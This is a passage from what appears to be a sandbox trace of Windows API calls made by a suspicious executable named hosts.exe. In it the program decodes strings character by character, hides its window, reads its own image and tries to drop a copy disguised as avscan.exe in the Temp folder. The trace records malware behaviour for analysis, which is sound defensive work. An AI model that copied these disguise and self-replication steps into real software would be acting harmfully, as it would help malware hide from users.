lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x10eea2c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.984] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.985] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x10eea14, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.985] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.986] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x10eea2c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.986] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.987] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x10eea14, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.987] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.987] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x10eea2c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0178.988] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.988] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x10eea14, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0178.989] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.989] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x10eea2c, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0178.989] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.990] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="X", cbMultiByte=1, lpWideCharStr=0x10eea14, cchWideChar=1 | out: lpWideCharStr="X") returned 1 [0178.990] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.991] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x10eea2c, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0178.991] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.991] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x10eea14, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0178.992] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.992] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x10eea2c, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0178.992] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.993] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="b", cbMultiByte=1, lpWideCharStr=0x10eea14, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0178.993] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0178.994] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0178.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x10eea2c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0178.994] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0179.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f74a, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Àú(", lpUsedDefaultChar=0x0) returned 1 [0179.000] VarSub (in: pvarLeft=0x28f99c, pvarRight=0x28f8d8, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0179.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x10eea14, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.000] VarCat (in: pvarLeft=0x28fa1c, pvarRight=0x28f9ec, pvarResult=0x28f948 | out: pvarResult=0x28f948) returned 0x0 [0179.001] IsWindowVisible (hWnd=0x203e6) returned 0 [0179.001] ShowWindow (hWnd=0x203e6, nCmdShow=0) returned 0 [0179.001] GetWindowLongA (hWnd=0x203e6, nIndex=-20) returned 262400 [0179.001] SetWindowLongA (hWnd=0x203e6, nIndex=-20, dwNewLong=262400) returned 262400 [0179.001] NtdllDefWindowProc_A (hWnd=0x203e6, Msg=0x7c, wParam=0xffffffec, lParam=0x28f42c) returned 0x0 [0179.002] NtdllDefWindowProc_A (hWnd=0x203e6, Msg=0x7d, wParam=0xffffffec, lParam=0x28f42c) returned 0x0 [0179.002] NtdllDefWindowProc_A (hWnd=0x203e6, Msg=0xd, wParam=0x208, lParam=0x28dd50) returned 0x0 [0179.003] IsWindowVisible (hWnd=0x203e6) returned 0 [0179.003] ShowWindow (hWnd=0x203e6, nCmdShow=0) returned 0 [0179.003] ShowWindow (hWnd=0x403e0, nCmdShow=0) returned 1 [0179.003] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0179.004] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x46, wParam=0x0, lParam=0x28f680) returned 0x0 [0179.005] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0x47, wParam=0x0, lParam=0x28f680) returned 0x0 [0179.006] lstrcpyA (in: lpString1=0xe62b58, lpString2="C:\\windows\\hosts.exe" | out: lpString1="C:\\windows\\hosts.exe") returned="C:\\windows\\hosts.exe" [0179.007] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x6) returned 0xe6bcd0 [0179.007] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe62b78 | out: hHeap=0xe50000) returned 1 [0179.008] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe62b58 | out: hHeap=0xe50000) returned 1 [0179.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="hosts", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0179.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="hosts", cbMultiByte=-1, lpWideCharStr=0x10eea2c, cchWideChar=6 | out: lpWideCharStr="hosts") returned 6 [0179.008] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe6bcd0 | out: hHeap=0xe50000) returned 1 [0179.008] CharUpperBuffW (in: lpsz="hosts", cchLength=0x6 | out: lpsz="HOSTS") returned 0x6 [0179.008] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f5a8, nSize=0x104 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0179.008] lstrcpynA (in: lpString1=0x28f494, lpString2="C:\\windows\\hosts.exe", iMaxLength=260 | out: lpString1="C:\\windows\\hosts.exe") returned="C:\\windows\\hosts.exe" [0179.008] lstrlenA (lpString="C:\\windows\\hosts.exe") returned 20 [0179.009] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x15) returned 0xe62b58 [0179.009] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x15) returned 0xe62b78 [0179.009] lstrcpyA (in: lpString1=0xe62b58, lpString2="C:\\windows\\hosts.exe" | out: lpString1="C:\\windows\\hosts.exe") returned="C:\\windows\\hosts.exe" [0179.015] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x6) returned 0xe6bcd0 [0179.015] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe62b78 | out: hHeap=0xe50000) returned 1 [0179.015] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe62b58 | out: hHeap=0xe50000) returned 1 [0179.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="hosts", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0179.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="hosts", cbMultiByte=-1, lpWideCharStr=0x10f7c2c, cchWideChar=6 | out: lpWideCharStr="hosts") returned 6 [0179.015] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe6bcd0 | out: hHeap=0xe50000) returned 1 [0179.016] CharUpperBuffW (in: lpsz="hosts", cchLength=0x6 | out: lpsz="HOSTS") returned 0x6 [0179.016] VarCmp (pvarLeft=0x28f938, pvarRight=0x28f9bc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0179.016] VarCmp (pvarLeft=0x28f908, pvarRight=0x28f9cc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0179.016] VarAnd (in: pvarLeft=0x28f928, pvarRight=0x28f8f8, pvarResult=0x28f8e8 | out: pvarResult=0x28f8e8) returned 0x0 [0179.016] FileSystemObject:IDispatch:Invoke (in: This=0x3f2c54, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f700*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f948, pExcepInfo=0x28f6e0, puArgErr=0x28f710 | out: pDispParams=0x28f700*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f948*(varType=0x8, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), varVal2=0x0), pExcepInfo=0x28f6e0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f710*=0x28f908) returned 0x0 [0179.018] VarCat (in: pvarLeft=0x28f948, pvarRight=0x28f9fc, pvarResult=0x28f938 | out: pvarResult=0x28f938) returned 0x0 [0179.018] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f4cc, nSize=0x104 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0179.018] lstrcpynA (in: lpString1=0x28f3b8, lpString2="C:\\windows\\hosts.exe", iMaxLength=260 | out: lpString1="C:\\windows\\hosts.exe") returned="C:\\windows\\hosts.exe" [0179.018] lstrlenA (lpString="C:\\windows\\hosts.exe") returned 20 [0179.018] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x15) returned 0xe62b58 [0179.018] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x15) returned 0xe62b78 [0179.018] lstrcpyA (in: lpString1=0xe62b58, lpString2="C:\\windows\\hosts.exe" | out: lpString1="C:\\windows\\hosts.exe") returned="C:\\windows\\hosts.exe" [0179.020] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xb) returned 0xe61d20 [0179.020] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe62b78 | out: hHeap=0xe50000) returned 1 [0179.020] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe62b58 | out: hHeap=0xe50000) returned 1 [0179.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\windows", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0179.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\windows", cbMultiByte=-1, lpWideCharStr=0x10f7c7c, cchWideChar=11 | out: lpWideCharStr="C:\\windows") returned 11 [0179.021] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe61d20 | out: hHeap=0xe50000) returned 1 [0179.021] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f4cc, nSize=0x104 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0179.021] lstrcpynA (in: lpString1=0x28f3b8, lpString2="C:\\windows\\hosts.exe", iMaxLength=260 | out: lpString1="C:\\windows\\hosts.exe") returned="C:\\windows\\hosts.exe" [0179.021] lstrlenA (lpString="C:\\windows\\hosts.exe") returned 20 [0179.021] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x15) returned 0xe62b58 [0179.021] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x15) returned 0xe62b78 [0179.021] lstrcpyA (in: lpString1=0xe62b58, lpString2="C:\\windows\\hosts.exe" | out: lpString1="C:\\windows\\hosts.exe") returned="C:\\windows\\hosts.exe" [0179.023] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x6) returned 0xe6bcd0 [0179.023] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe62b78 | out: hHeap=0xe50000) returned 1 [0179.023] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe62b58 | out: hHeap=0xe50000) returned 1 [0179.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="hosts", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0179.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="hosts", cbMultiByte=-1, lpWideCharStr=0x10eea2c, cchWideChar=6 | out: lpWideCharStr="hosts") returned 6 [0179.023] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe6bcd0 | out: hHeap=0xe50000) returned 1 [0179.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\windows\\hosts.exe", cchWideChar=-1, lpMultiByteStr=0x28f410, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\windows\\hosts.exe", lpUsedDefaultChar=0x0) returned 21 [0179.025] GetFullPathNameA (in: lpFileName="C:\\windows\\hosts.exe", nBufferLength=0x104, lpBuffer=0x28f540, lpFilePart=0x28f408 | out: lpBuffer="C:\\windows\\hosts.exe", lpFilePart=0x28f408*="hosts.exe") returned 0x14 [0179.111] CreateFileA (lpFileName="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f500, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0179.112] GetFileType (hFile=0x15c) returned 0x1 [0179.112] IMalloc:Alloc (This=0x76da66bc, cb=0x51) returned 0x11029b8 [0179.112] IMalloc:Realloc (This=0x76da66bc, pv=0x0, cb=0x60) returned 0x10efee0 [0179.113] SetFilePointer (in: hFile=0x15c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0179.113] SetFilePointer (in: hFile=0x15c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1442557 [0179.113] SetFilePointer (in: hFile=0x15c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0181.267] IMalloc:Alloc (This=0x76da66bc, cb=0x2884a9a) returned 0x6480020 [0181.269] ReadFile (in: hFile=0x15c, lpBuffer=0x6480020, nNumberOfBytesToRead=0x144254d, lpNumberOfBytesRead=0x28f5a0, lpOverlapped=0x0 | out: lpBuffer=0x6480020*, lpNumberOfBytesRead=0x28f5a0*=0x144254d, lpOverlapped=0x0) returned 1 [0187.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MZ\x90", cbMultiByte=21243213, lpWideCharStr=0x3bf0024, cchWideChar=21243213 | out: lpWideCharStr="MZ\x90") returned 21243213 [0187.554] IMalloc:Free (This=0x76da66bc, pv=0x6480020) [0188.336] CloseHandle (hObject=0x15c) returned 1 [0188.336] IMalloc:Free (This=0x76da66bc, pv=0x11029b8) [0188.336] GetLocalTime (in: lpSystemTime=0x28f61c | out: lpSystemTime=0x28f61c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x18, wMilliseconds=0x9a)) [0188.337] VarDateFromUdate (in: pudateIn=0x28f640, dwFlags=0x0, pdateOut=0x28f61c | out: pdateOut=0x28f61c) returned 0x0 [0188.337] SysReAllocStringLen (in: pbstr=0x28f05c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x28f05c*="kernel32.dll") returned 1 [0188.337] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0188.338] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x75a80000 [0188.342] GetLastError () returned 0x0 [0188.342] SetLastError (dwErrCode=0x0) [0188.349] GetProcAddress (hModule=0x75a80000, lpProcName="NlsGetCacheUpdateCount") returned 0x75aad34f [0188.351] SysReAllocStringLen (in: pbstr=0x28f220*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x28f220*="kernel32.dll") returned 1 [0188.351] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0188.352] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a80000 [0188.360] GetProcAddress (hModule=0x75a80000, lpProcName="GetCalendarInfoW") returned 0x75aad505 [0188.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchWideChar=-1, lpMultiByteStr=0x28f410, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpUsedDefaultChar=0x0) returned 48 [0188.362] GetFullPathNameA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28f540, lpFilePart=0x28f408 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28f408*="avscan.exe") returned 0x2f [0188.363] CreateFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x28f500, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.525] GetLastError () returned 0x20 [0188.525] GetLastError () returned 0x20 [0188.525] SetLastError (dwErrCode=0x20) [0188.525] GetLastError () returned 0x20 [0188.526] SetLastError (dwErrCode=0x20) [0188.526] GetLastError () returned 0x20 [0188.527] SetLastError (dwErrCode=0x20) [0188.527] GetLastError () returned 0x20 [0188.527] SetLastError (dwErrCode=0x20) [0188.527] GetLastError () returned 0x20 [0188.527] SetLastError (dwErrCode=0x20) [0188.527] GetLastError () returned 0x20 [0188.527] SetLastError (dwErrCode=0x20) [0188.527] GetLastError () returned 0x20 [0188.528] SetLastError (dwErrCode=0x20) [0188.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0188.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x10f7cf4, cchWideChar=12 | out: lpWideCharStr="ProjShell32") returned 12 [0188.528] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x28f4fc) [0188.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0188.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x10f7cf4, cchWideChar=12 | out: lpWideCharStr="ProjShell32") returned 12 [0188.531] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x28f5d4) [0188.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0188.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x10f7cf4, cchWideChar=12 | out: lpWideCharStr="ProjShell32") returned 12 [0188.532] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x28f5d4) [0190.163] FileSystemObject:IDispatch:Invoke (in: This=0x3f2d04, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f700*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f948, pExcepInfo=0x28f6e0, puArgErr=0x28f710 | out: pDispParams=0x28f700*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f948*(varType=0x8, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1="C:\\Windows" (normalized: "c:\\windows"), varVal2=0x0), pExcepInfo=0x28f6e0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f710*=0x50) returned 0x0 [0190.227] VarCat (in: pvarLeft=0x28f948, pvarRight=0x28fa54, pvarResult=0x28f938 | out: pvarResult=0x28f938) returned 0x0 [0190.228] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f4cc, nSize=0x104 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 